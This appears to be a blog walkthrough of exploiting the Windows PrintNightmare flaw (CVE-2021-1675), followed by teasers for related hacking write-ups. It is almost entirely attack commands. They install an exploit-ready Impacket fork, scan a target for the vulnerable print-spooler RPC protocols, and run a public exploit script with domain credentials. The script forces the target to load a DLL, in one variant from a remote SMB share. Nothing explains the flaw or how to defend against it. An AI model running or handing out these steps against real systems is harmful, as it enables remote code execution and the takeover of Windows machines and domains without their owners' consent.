Skip to content

PrintNightmare (CVE-2021-1675) Walkthrough

pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install

Scan for potential vulnerable hosts

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Output:

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Attack Machine

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'
https://github.com/cube0x0/CVE-2021-1675

Related Posts

Exploiting log4j | TryHackMe Solar Write Up

CVE-2021-44228 Apache Solr 8.11.1 What service is running on port 8983? (Just the name of the software) Open the service running on port 8983 in… 

Read More »Exploiting log4j | TryHackMe Solar Write Up

TryhackMe Windows PrivEsc Walktrought

Practice your skills with this TryhackMe Windows PrivEsc on an intentionally misconfigured Windows VM with multiple ways to get admin/SYSTEM! RDP is available. Credentials: user:password321… 

Read More »TryhackMe Windows PrivEsc Walktrought

How to Install Impacket

What is Impacket? Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the… 

Read More »How to Install Impacket